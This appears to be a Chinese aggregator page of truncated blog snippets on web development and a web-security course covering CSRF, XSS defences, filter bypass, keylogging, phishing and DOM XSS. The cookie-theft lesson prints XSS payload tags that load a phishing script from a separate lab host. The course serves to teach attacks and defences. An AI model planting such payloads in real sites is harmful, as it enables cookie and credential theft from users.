web学习第二天】的更多相关文章

今天是学习web的第二天,早上用css3做了个会动的小熊,border-radius为圆的半径, .smallxiong {    width: 400px;    height: 400px;    background: cadetblue;    border-radius: 200px;    position: relative;    transition: transform 2s;   }   .smallxiong:hover{    transform: rotate(720…
第一天的学习在这http://www.cnblogs.com/tobecrazy/p/3444474.html 2.jsp 基础知识 Jsp页面中的Java脚本主要有3部分:声明(Declaration).表达式(Expression)和脚本代码段(Scriptlet),三种形式的Java脚本语法都是<%开头, 以%>结尾 Jsp页面中数据和方法声明 声明语法:<%! 声明表达式;  %> <%! int a; %>  定义整型变量 <%! float b,c=3…
风炫安全web安全学习第二十九节课 CSRF防御措施 CSRF防御措施 增加token验证 对关键操作增加token验证,token值必须随机,每次都不一样 关于安全的会话管理(SESSION) 不要在客户端保存敏感信息 关闭浏览器直接销毁SESSION 设置会话过期操作,比如超过15分钟没有操作,直接销毁SESSION 访问控制的安全管理 敏感信息修改的时候需要二次验证,比如修改密码需要验证旧密码. 敏感信息修改使用POST,而不是GET 通过HTTP头部的REFERER来限制原来页面 增加验…
风炫安全web安全学习第二十八节课 CSRF攻击原理 CSRF 简介 跨站请求伪造 (Cross-Site Request Forgery, CSRF),也被称为 One Click Attack 或者 Session Riding ,通常缩写为CSRF,是一种对网站的恶意利用.尽管听起来像XSS,但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站. 在攻击的场景伪造一个请求(一般是一个链接),然后欺骗用户点击,用户一旦点击了这个请求,整…
风炫安全WEB安全学习第二十七节课 XSS的防御措施 XSS防御措施 总的原则 控制好输入/输出 过滤:根据业务需求进行过滤,对email,手机号码这样的输入框进行验证. 转义:所有输出到前端的数据都根据输出点进行转义,对输入的字符串进行html实体化编码 PHP php可以用以下函数来防御 htmlspecialchars(); htmlentities(); HTMLPurifier.auto.php插件 http://htmlpurifier.org/download RemoveXss函…
风炫安全WEB安全学习第二十六节课 XSS常见绕过防御技巧 XSS绕过-过滤-编码 核心思想 后台过滤了特殊字符,比如说…
风炫安全WEB安全学习第二十五节课 利用XSS键盘记录 XSS键盘记录 同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源.所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据是会被拒绝的. 同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互.这是一个用于隔离潜在恶意文件的重要安全机制. 注意,资源文件不受影响: <script src="..."> <img src="..…
风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击 XSS钓鱼攻击 HTTP Basic Authentication认证 大家在登录网站的时候,大部分时候是通过一个表单提交登录信息. 但是有时候浏览器会弹出一个登录验证的对话框,如下图,这就是使用HTTP基本认证. 在你访问一个需要HTTP Basic Authentication的URL的时候,如果你没有提供用户名和密码,服务器就会返回401,如果你直接在浏览器中打开,浏览器会提示你输入用户名和密码,也就是上面的图示. 要在发送请求的时候…
风炫安全WEB安全学习第二十三节课 利用XSS获取COOKIE XSS如何利用 获取COOKIE 我们使用pikachu写的pkxss后台 使用方法: <img src="http://fx.com/pikachu/pkxss/xfish/xfish.php" /> <script src="http://fx.com/pikachu/pkxss/xfish/xfish.php"></script> 参考: http://blog…
风炫安全WEB安全学习第二十二节课 DOM型XSS讲解 Dom型XSS演示 通过Javascript,可以重构整个HTML文档,你可以添加.移除.改变或重排页面上的项目 要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行访问的入口,这个入口,连同对HTML元素进行添加.移动.改变或者移除的方法和属性,都是通过文档对象模型来获得的(DOM) 所以,你可以把DOM理解为一个一个访问HTML的标准编程接口 参考: http://blog.evalshell.com/202…